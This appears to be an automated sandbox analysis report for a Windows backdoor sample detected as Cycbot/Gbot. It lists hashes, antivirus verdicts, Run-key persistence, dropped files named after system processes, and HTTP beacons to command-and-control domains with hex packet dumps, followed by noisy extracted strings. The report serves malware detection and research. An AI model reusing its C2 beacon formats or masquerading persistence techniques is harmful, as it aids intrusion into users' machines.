Analysis Date2015-01-17 13:53:46
MD5817a59afd18c72c6c35c040499dff1cc
SHA1b9b6d197d00700404b1209d5dbf305165f35c734

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 452358b409d706e69b824c8aa8b9b807 sha1: b25eace1f232db7b82c01cb36980e177565cd6d0 size: 112640
Section.rdata md5: aead6bf6ce1c4e050e12820dc79bb7c2 sha1: acb70bb494b7948a5f0374766e748eb0e5dc3f1e size: 1024
Section.data md5: 7a8bad8d29a702eb727bc3897c3cde88 sha1: 429e4c8f3652a4c32a1166732b9d8da85be86a5d size: 66560
Section.reloc md5: edf6451d405777a4c1de22af61d40d04 sha1: 8bfd68b276c6aab17581fa9b526507862646e536 size: 1024
Timestamp2005-10-29 07:03:34
PEhashece4578c4d5b41039e673c8e52830e59d401730c
IMPhash4eb3fae2e5d5b84e8059aebd86a6504d
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.5
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-449
AVDr. WebBackDoor.Gbot.73
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.SXV
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSgreenherbalteaonline.com
Winsock DNS127.0.0.1
Winsock DNScoolmediastore.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSgreenherbalteaonline.com
Type: A
209.222.14.3
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSyourmediaresources.com
Type: A
DNScoolmediastore.com
Type: A
HTTP GEThttp://greenherbalteaonline.com/images/greenherbalteagirlholdingcup250.gif?v13=90&tq=gJ4WK%2FSUh6THhRMw9YLJqMSTUivqg4akxZNSK%2B%2FbxWq1SfkIYVBe
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 67726565   GET /images/gree
0x00000010 (00016)   6e686572 62616c74 65616769 726c686f   nherbalteagirlho
0x00000020 (00032)   6c64696e 67637570 3235302e 6769663f   ldingcup250.gif?
0x00000030 (00048)   7631333d 39302674 713d674a 34574b25   v13=90&tq=gJ4WK%
0x00000040 (00064)   32465355 68365448 68524d77 39594c4a   2FSUh6THhRMw9YLJ
0x00000050 (00080)   714d5354 55697671 6734616b 785a4e53   qMSTUivqg4akxZNS
0x00000060 (00096)   4b253242 25324662 78577131 53666b49   K%2B%2FbxWq1SfkI
0x00000070 (00112)   59564265 20485454 502f312e 300d0a43   YVBe HTTP/1.0..C
0x00000080 (00128)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000090 (00144)   0d0a486f 73743a20 67726565 6e686572   ..Host: greenher
0x000000a0 (00160)   62616c74 65616f6e 6c696e65 2e636f6d   balteaonline.com
0x000000b0 (00176)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x000000c0 (00192)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 70537225 32466525 32425635   2BsqpSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53253246   ij%2B8yjYvEaS%2F
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384369 59764561 53765425   ij%2B8CiYvEaSvT%
0x000000c0 (00192)   32427371 70693852 704c3666 68537225   2Bsqpi8RpL6fhSr%
0x000000d0 (00208)   32466525 32425635 5a755267 25334425   2Fe%2BV5ZuRg%3D%
0x000000e0 (00224)   33442048 5454502f 312e310d 0a486f73   3D HTTP/1.1..Hos
0x000000f0 (00240)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x00000100 (00256)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000110 (00272)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000120 (00288)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000130 (00304)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
W
.
..
.F.
Y
.
.

080904b0
1.0.0.1
1744
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``````
^^^^^^^^
^^^^^^^^^
^^^^^^^^^^^^^
~~~~~~~~~
~~~~~~~~~~~
<<<<<<<<<<<<<<<<
||||||||
|||||||||
||||||||||
        
         
___________
------------
,,,,,,,
::::::
!!!!!!!!!
?  @&  
...........
''``````````
''''''
'''''''
''''''''
"` $@ 
"""""""""""
((((((((((((
)))))))))
))))))))))))))))
{{{{{{{{
********  
\\{{{{
\\\\\\\\\\\
&&&&&&
##############
%%%%%%
							
												
000000
00vvvvvvvvvvvv
/0mzM:
0-W-`R
11111111
1111111111111
11111UUUU
132Twx
1m?aUl_p?
1oFN,D
1<yaS"
2G"gGo
2hhhhhhhhhh
2HY5'n
 @2k8}
2ky8<L
2&mqp~
2 |Sg%
2v0E=*
&&3""""""""""
.31&YX
#3338888
3bc tF
3h0c@]
3=   u
44444444
44444444444
444444444444444444
44444U
4@;9Y&
4Vuq`.
)4y2q,@@
55555555555555555555gggg
5~eBGAl
5" `eh
5ft8s@U
<5lerT]
-{6|*` 
]6< @`:
;;666666
]6666666
777777
(_7;cYF
7TJ"  cV
#84<XN
88:::::
%%88888
88888""""
_8G[t~9d
8l+F{7;
 /8	sOs
9|-@050
91k" `
]	9BV>
9?SmBm
9VWF<]
9Y-MSjd
@@?9yt
9YYAGF
AAAAAAFFFFFFFFF
AABBBBBBBBBBBBB
"``+aE
aehnJSq
$@`AfXLs]
ajA"{T
a<JD|2
<aK\;y
>A+pM~K5gv
 AS.7B
ASIF	-
Au's4hD+V
B///<<
B642|]zH
^[B9]D
########bbb
``````````bbbbbb
[bbbbbbbbb
bEEEyyyyyy
#`*b_v\
}c5XY$
c63=R/
@`c8!H
CbizR{
CCCCCCCCC
cDFmXi6
C>$GQN7
ClipCursor
CreatePopupMenu
D0s7B*&m
d3D+~:	>]
@.data
&&&&dd
. @=DD"
DDDDDD
""DDDDDDDDDJJ
DDDDooo
DestroyMenu
d@gikM
dhGyi<
D""&&&&iiiiiiii@@@@@@
` d~t\
DuplicateHandle
(<{D`UQ
d`|x+X
e*@`0B
ebG(@@
E/|c*?
EEEEEEE
eeeeeeeeeeeeeeeeeeeeeeeeeeeee
EEEErrrrr
E. @f#5
E@~'Lf=
_E%lHY1
eME8!74
EnumResourceNamesW
Ep9$Fp[
EqbRAAp
f0U--xv
`F)6au!
F*  aq|
+]f+c/
[=F<ey
ffffff
fffffffff
^FFFFFFFFF
"Fg^qD
FHj{e]Dp
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
FJ,*kht6
@@FkUnx|
FlushInstructionCache
FrVE)l
fuug9h
F$ `;w
g8&Qum;
,Gch3j(
<gdpT=x
GetDesktopWindow
GetModuleFileNameW
GGGGGG
GGGGGGGGGGGGGGG
ggggggggggggggWWWW
<g( `h
`@GhI0
;Gj* @
gmkvwr
$gnG(1
g~!oEC&
g!~[t\
G|w1O|
/'GX'A
hfX%.W
HHHHHHHHHH
hhhhhhhhhhh
HHHHHHHHHHH
@`Hhi&
[Hy7z%"G
%%%%%i
.I?DQF
i~GlUf
}iGu3=
II"""""""""X
`@-.@@|iu
IYKM\oU
j;9AK$
j"9;Zm
jA3EZo
J}m,@@j
J+Mv|*
J!nnT''
J,t4s9
`Jy"@`*
k1*@ " 
K1	}wK
K\"@ 8
k8ckJu
kD*@`;
:Ke92?
KERNEL32.dll
kkkkk6SSSfffffff
kkkkkkkkk
kkkkkkkkkkkk
K+QK}}
KS,`@m$
kveV(`
/)+L6z=
L* a96cS*
LIulrj
LLLLLLLLLL--
LLLLLLLvvvvvv
L!LnfSQ
@;" @Ls
lwB9<l
'*` M,
MapViewOfFile
MC/_/Vqg
M~;F;n
!mhPAPI
*MJQu[
MMM>>^^^^
mmmmmmmm
[/Mm#u
M(o+Z\
mU8M;,a
m\@w*`@
)m+Y<J
N[ 0\uw2<G-Ce
NA`|L:
NdrComplexArrayFree
@NInZYP
nKj">T
 `nl[Ov
@@N(@`N
NNNNNN
nnnnnnn
N(@`P5
nW)`i,
O>2-ig_
oc>OnD
O/;}d<
.ofKlC
,@ OhI
`oizGi
oLO~,P)
OOOO))))
OOOO[[[
ooooooBBmmmmmmmm
ooooooooo
OOOOOOOOO
ooooooooooooo
OOOOOOOOOOOOOOO
OOOOOOOOXX
%Oo>YW
 `OQx=
OwwPPPPPP
%OWXBp
%!P'&@
``p~1@
P!/6QF
>p^9Kiy
p;b;>s"
- PLi4
plU~)|
pppp)))))))))
$ppppppp
pppttttttttttt
?Pv[HS9
pW8@|	
_____Q
q>0T0xP
q!4P.Ic
Q\@6vH
-Qb}],
q"@ G'
@ 	}qJ$
Q&pG-!w
QQ____
Qq=2W{
QQQ'''''''\\\
qqqEEEEEE
qqqqqqqqOOOOOOOOOOOOOOO
qqqqqqqqq
QQQQQQQQQQQQQ
QtX20X
` q+~vf
@r/|%-
r32-)g
R3(n'j
RBo$A4
`.rdata
r@DFp	x8
RedrawWindow
.reloc
>RL`VA
RPCRT4.dll
rrrrrrrrrrrrrr
rSSSSSSSS
rVqA]4.@
/'s( `
s+++++++++
S|||||||||||||
 S9)I(
sAQi, 
SetFileShortNameW
~Sh{9@
SHELL32.dll
Shell_NotifyIconA
S.@ HNC
!s(o84A
ssJJJJJJJJJ
....SSSSSS%%%
ssssssssssss
	!SX<Aw+2
.@ szo\
^(&t'	
"`@)+t
T?1K$R
Te^)g9<
@`Tg3r
!This program cannot be run in DOS mode.
timeEndPeriod
TLXqqH
Tmi3"w@
TMSsS8
TmY!?YL
, T.r2j
TrackPopupMenuEx
tslv*@
TT||||||||=====
tttt              9
TTTTkkkkkkkkk
TTTTTTTTTTT>>>>>>>>>>>>>
ttttttttttttt
T\z @`
u>	,0mr
@u,@ 7
-UG#MM
uhg8c+
u*i$:`
-,UL+D
/umQP8[f0yO7
UnmapViewOfFile
u,P>+f
USER32
UuidCreate
<<<<<<UUU
uuuuuuuuu
UUUUUUUUUUhhhh
uuuuuuuuuuuuuuuu
uWTWb&
ux2Q,@
v******
@`V, `
v7+qGn
V/7!t5
vdnP~r
VegP,J
;'?V\I
Vooyyyyyyyy
VP?s5D
vrID}b
vvvIIIIIIIII
VVVVVVV
VVVVVVVVVVV
vvvxxxx`````
`@!W>?
wD,@`*
WINMM.dll
wo[7%M
wQ=>wSo
}w}@=r
(wRC+5
wsucA[
?				WWWWWWWW
wwwwwwwwww
WX''!%
W.``]Y
X;0M&a
 `XD*@
x!G1~[m
Xh3+fq
 >xmOZ);
xPCkf2
 @XR8c
>X, `U
xxhhhh77777
xxxxxxxx
XXXXXXXXX
 @@yI4fV7
`+YMj.
y`"@`N
y	P@PM
yyyyyy
yyyyyyy
YYYYYYY
!!*yyyyyyyyyyyy
y-znM{
Z0azh6
z=\ ?b
)&Z==k@
Z@KpL<j
zqh.dll
.z'S`P
"``:ZTa
@#zt@~M
#ZUN;Pt
 ZWHS,
zz2af4
[[[[zzz
zzzzzzzz